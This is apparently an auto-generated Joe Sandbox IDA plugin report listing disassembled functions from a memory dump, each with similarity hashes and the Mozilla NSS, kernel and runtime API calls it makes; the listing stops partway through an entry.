Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 1d45638770965bd02d9e8f146ef0d602da8edd74077278e8dad5b9c81e7a3c06
Instruction ID: d57c369580cd7ebc1cd67f75c2ed1f1e45f8edeb66eddff8b5faddf9a70a89c2
Opcode Fuzzy Hash: 1d45638770965bd02d9e8f146ef0d602da8edd74077278e8dad5b9c81e7a3c06
Instruction Fuzzy Hash: 1EA10771905300DBEB008BAADC85B6F32A4EB8530CF244939E959CBB95FF75D8468793

Function 6C56AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C54AB95,00000000,?,00000000,00000000,00000000), ref: 6C56AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C54AB95,00000000,?,00000000,00000000,00000000), ref: 6C56AF39
PR_Unlock.NSS3(?,?,?,6C54AB95,00000000,?,00000000,00000000,00000000), ref: 6C56AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C54AB95,00000000,?,00000000,00000000,00000000), ref: 6C56AF69
TlsGetValue.KERNEL32 ref: 6C56B06B
EnterCriticalSection.KERNEL32(?), ref: 6C56B083
PR_Unlock.NSS3(?), ref: 6C56B0A4
TlsGetValue.KERNEL32 ref: 6C56B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C56B0D9
PR_Unlock.NSS3 ref: 6C56B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C56B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C56B182

Part of subcall function 6C59FAB0: free.MOZGLUE(?,-00000001,?,?,6C53F673,00000000,00000000), ref: 6C59FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C56B177

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C54AB95,00000000,?,00000000,00000000,00000000), ref: 6C56B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C54AB95,00000000,?,00000000,00000000,00000000), ref: 6C56B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C54AB95,00000000,?,00000000,00000000,00000000), ref: 6C56B1C2

Part of subcall function 6C591560: TlsGetValue.KERNEL32(00000000,?,6C560844,?), ref: 6C59157A
Part of subcall function 6C591560: EnterCriticalSection.KERNEL32(?,?,?,6C560844,?), ref: 6C59158F
Part of subcall function 6C591560: PR_Unlock.NSS3(?,?,?,?,6C560844,?), ref: 6C5915B2

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 3360e4d2ecfeca4087e767cf89c64422ad61fa27d5b39a890c2f700b11b1058a
Instruction ID: 299d058bbf90d3dff390d6a15eae4f9714025b796c64b915bf091f14596923c6
Opcode Fuzzy Hash: 3360e4d2ecfeca4087e767cf89c64422ad61fa27d5b39a890c2f700b11b1058a
Instruction Fuzzy Hash: 4EA1C3B5D00205EBEF00AF66DC81AEEBBB4EF45308F144125E905A7B61E731E955CBA1

Function 6C562C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?Vl,?,6C55E477,?,?,?,00000001,00000000,?,?,6C563F23,?), ref: 6C562C62
EnterCriticalSection.KERNEL32(0000001C,?,6C55E477,?,?,?,00000001,00000000,?,?,6C563F23,?), ref: 6C562C76
PL_HashTableLookup.NSS3(00000000,?,?,6C55E477,?,?,?,00000001,00000000,?,?,6C563F23,?), ref: 6C562C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C55E477,?,?,?,00000001,00000000,?,?,6C563F23,?), ref: 6C562C93

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C55E477,?,?,?,00000001,00000000,?,?,6C563F23,?), ref: 6C562CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C55E477,?,?,?,00000001,00000000,?,?,6C563F23,?), ref: 6C562CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C55E477,?,?,?,00000001,00000000,?,?,6C563F23), ref: 6C562CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C55E477,?,?,?,00000001,00000000,?), ref: 6C562CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C55E477,?,?,?,00000001,00000000,?), ref: 6C562D4D
EnterCriticalSection.KERNEL32(?), ref: 6C562D61
PL_HashTableLookup.NSS3(?,?), ref: 6C562D71
PR_Unlock.NSS3(?), ref: 6C562D7E

Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307AD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307CD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307D6
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4C204A), ref: 6C5307E4
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,6C4C204A), ref: 6C530864
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C530880
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,6C4C204A), ref: 6C5308CB
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308D7
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308FB

Strings

#?Vl, xrefs: 6C562C43

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?Vl
API String ID: 2446853827-336702144
Opcode ID: a82f362fa8fae5976404c90e3140646a39dcacc6cce9103b8838ede21e71bc66
Instruction ID: 7cf0576ab70d920d0075b830ef33a8873b630ba477a1d270685e3deb7af03884
Opcode Fuzzy Hash: a82f362fa8fae5976404c90e3140646a39dcacc6cce9103b8838ede21e71bc66
Instruction Fuzzy Hash: C851F2B6D00205EBEB009F25DC858AA7778BF5935CF048521EC1997B21EB31ED68CBE1

Function 6C5BAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BADB1

Part of subcall function 6C59BE30: SECOID_FindOID_Util.NSS3(6C55311B,00000000,?,6C55311B,?), ref: 6C59BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5BADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5BAE08

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5BAE25
PL_FreeArenaPool.NSS3 ref: 6C5BAE63
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C5BAE4D

Part of subcall function 6C4C4C70: TlsGetValue.KERNEL32(?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4C97
Part of subcall function 6C4C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CB0
Part of subcall function 6C4C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BAE93
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C5BAECC
PL_FreeArenaPool.NSS3 ref: 6C5BAEDE
PL_FinishArenaPool.NSS3 ref: 6C5BAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BAEF5
PL_FinishArenaPool.NSS3 ref: 6C5BAF16

Strings

security, xrefs: 6C5BADEE

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: eef961830e440bac58f640e1f0f2aa55a54614b7173a2e8b1675203ee2f22d05
Instruction ID: 36bd592a66f8cfba418e89b063e857cffa37ff6b29dacfa2a866d59a6a30a7aa
Opcode Fuzzy Hash: eef961830e440bac58f640e1f0f2aa55a54614b7173a2e8b1675203ee2f22d05
Instruction Fuzzy Hash: 6E413AB5940300ABF7209B599C94BAF3AA8AF8270CF500925F914B6F41FB35DD19C6D7

Function 6C65AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C609890: TlsGetValue.KERNEL32(?,?,?,6C6097EB), ref: 6C60989E

EnterCriticalSection.KERNEL32(?), ref: 6C65AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C65AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C65AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C65AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C65B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C65B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C65B070
PR_JoinThread.NSS3(?), ref: 6C65B07B
free.MOZGLUE(?), ref: 6C65B084
EnterCriticalSection.KERNEL32(?), ref: 6C65B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C65B0C4
PR_JoinThread.NSS3(?), ref: 6C65B0F3
free.MOZGLUE(?), ref: 6C65B0FC
PR_JoinThread.NSS3(?), ref: 6C65B137
free.MOZGLUE(?), ref: 6C65B140

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: ec0b1bca0e8b6074e29c8e3a3b04d9b2c8c5a978dea0f5c2a131eed4afad4e0e
Instruction ID: ad645b796b4928b04c5b71db02d56cf0ac39bdaf70e4e6ed357e66156d6275ed
Opcode Fuzzy Hash: ec0b1bca0e8b6074e29c8e3a3b04d9b2c8c5a978dea0f5c2a131eed4afad4e0e
Instruction Fuzzy Hash: 72918FB5A00601DFCB04DF15C880856BBF1FF8631C7698569D81A5BB22E732FC55CB99

Function 6C5D5CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C5D2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C5D2A28,00000060,00000001), ref: 6C5D2BF0
Part of subcall function 6C5D2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C5D2A28,00000060,00000001), ref: 6C5D2C07
Part of subcall function 6C5D2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C5D2A28,00000060,00000001), ref: 6C5D2C1E
Part of subcall function 6C5D2BE0: free.MOZGLUE(?,00000000,00000000,?,6C5D2A28,00000060,00000001), ref: 6C5D2C4A

free.MOZGLUE(?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5D0F
free.MOZGLUE(?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5D4E
free.MOZGLUE(?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5D62
free.MOZGLUE(?,?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5D85
free.MOZGLUE(?,?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5D99
free.MOZGLUE(?,?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C5D5E3E
free.MOZGLUE(?,?,?,?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C5D5E47
free.MOZGLUE(?,?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C5DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C5D5E78
free.MOZGLUE(?,?,?,?,?,?,?,6C5DAAD4), ref: 6C5D5EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C5DAAD4), ref: 6C5D5EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C5DAAD4), ref: 6C5D5F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C5DAAD4), ref: 6C5D5F4B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 5cfd5b99dabe262fd71c525892abed962b43d7006d0bbd5496adc5a0f8f768d8
Instruction ID: a28e0116c71a710753bdf845b98bb218bbca268498c57b9b0353a0a6708971ad
Opcode Fuzzy Hash: 5cfd5b99dabe262fd71c525892abed962b43d7006d0bbd5496adc5a0f8f768d8
Instruction Fuzzy Hash: C47189B4A00B019FD700DF24DC84A92B7B5FF89308F558529E85E87B11EB32F965CB96

Function 6C558DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C558E22
EnterCriticalSection.KERNEL32(?), ref: 6C558E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C558E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C558E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C558E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C558EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C558EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C558EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C558F00
free.MOZGLUE(?), ref: 6C558F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C558F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C558F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C558F5B
PR_Unlock.NSS3(?), ref: 6C558F72
PR_Unlock.NSS3(?), ref: 6C558F82

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 5d5cc84f52dcc3976ab21eab61700892bfeb2c5840c46491e2ad85d8c1cc1299
Instruction ID: 428bd83178c948420214a4de15e4d3dd81738d9d14c0d8bc1d84e046e89b4943
Opcode Fuzzy Hash: 5d5cc84f52dcc3976ab21eab61700892bfeb2c5840c46491e2ad85d8c1cc1299
Instruction Fuzzy Hash: 985106B2E40215AFDB009F68CC8496EB7B9EF45358F54452BE8089B700E732ED65C7E6

Function 6C650FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C651000

Part of subcall function 6C609BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C531A48), ref: 6C609BB3
Part of subcall function 6C609BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C531A48), ref: 6C609BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C651016

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_Unlock.NSS3(?), ref: 6C651021

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C651046
PR_Unlock.NSS3(?), ref: 6C65106B
PR_Lock.NSS3 ref: 6C651079
PR_Unlock.NSS3 ref: 6C651096
free.MOZGLUE(?), ref: 6C6510A7
free.MOZGLUE(?), ref: 6C6510B4
PR_DestroyCondVar.NSS3(?), ref: 6C6510BF
PR_DestroyCondVar.NSS3(?), ref: 6C6510CA
PR_DestroyCondVar.NSS3(?), ref: 6C6510D5
PR_DestroyCondVar.NSS3(?), ref: 6C6510E0
PR_DestroyLock.NSS3(?), ref: 6C6510EB
free.MOZGLUE(?), ref: 6C651105

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 14312a03b00b0471a2132dfcffe341f39773a3de442fe4c883317f0713b3b0aa
Instruction ID: 5744d9c3a8d1ded3ad3e2a6f4fc24e9183ebe0dd8e2bb337d66237da32e70674
Opcode Fuzzy Hash: 14312a03b00b0471a2132dfcffe341f39773a3de442fe4c883317f0713b3b0aa
Instruction Fuzzy Hash: DD318AB5A00401EBD702AF55ED81A45BB72BF45318F584134E80952F61EB72FD78DBCA

Function 6C4CDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C4CDD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C4CDD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C4CDE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C4CDEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4CDECD

Strings

%s at line %d of [%.10s], xrefs: 6C4CDF7C, 6C4CDFEC
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4CDF6D, 6C4CDFCC, 6C4CDFDD
database corruption, xrefs: 6C4CDF77, 6C4CDFE7

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: d6c66502ebb307f69c0c482346c5e280fd180139cd3cabbb104ca4ed051f6d40
Instruction ID: edada4176889cbdead1d1aa41d9a971d36333b3954e10c0927186a90520f80a6
Opcode Fuzzy Hash: d6c66502ebb307f69c0c482346c5e280fd180139cd3cabbb104ca4ed051f6d40
Instruction Fuzzy Hash: A3A1E475B446019FC710DF29C880E6AB7F5BF85308F15892DF8898BB61D731E846CBA6

Function 6C58EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C58EE0B

Part of subcall function 6C5A0BE0: malloc.MOZGLUE(6C598D2D,?,00000000,?), ref: 6C5A0BF8
Part of subcall function 6C5A0BE0: TlsGetValue.KERNEL32(6C598D2D,?,00000000,?), ref: 6C5A0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C58EEE1

Part of subcall function 6C581D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C581D7E
Part of subcall function 6C581D50: EnterCriticalSection.KERNEL32(?), ref: 6C581D8E
Part of subcall function 6C581D50: PR_Unlock.NSS3(?), ref: 6C581DD3

TlsGetValue.KERNEL32 ref: 6C58EE51
EnterCriticalSection.KERNEL32(?), ref: 6C58EE65
PR_Unlock.NSS3(?), ref: 6C58EEA2
free.MOZGLUE(?), ref: 6C58EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C58EED0
PR_Unlock.NSS3(?), ref: 6C58EF48
free.MOZGLUE(?), ref: 6C58EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C58EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C58EFA4
free.MOZGLUE(?), ref: 6C58EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C58F055
free.MOZGLUE(?), ref: 6C58F060

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: c226b000939be873caec790c522a8b769d2b980eb910a93a50099a374230cd69
Instruction ID: 1d531880940db48b5a7c235699bfadaeba3d3111ba1aef77662359775b79b301
Opcode Fuzzy Hash: c226b000939be873caec790c522a8b769d2b980eb910a93a50099a374230cd69
Instruction Fuzzy Hash: 28818EB5E01219ABDF00DFA5DC85AEE7BB5BF48318F140024E919A7711E771ED24CBA1

Function 6C554CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C554D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C554D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C554DF2
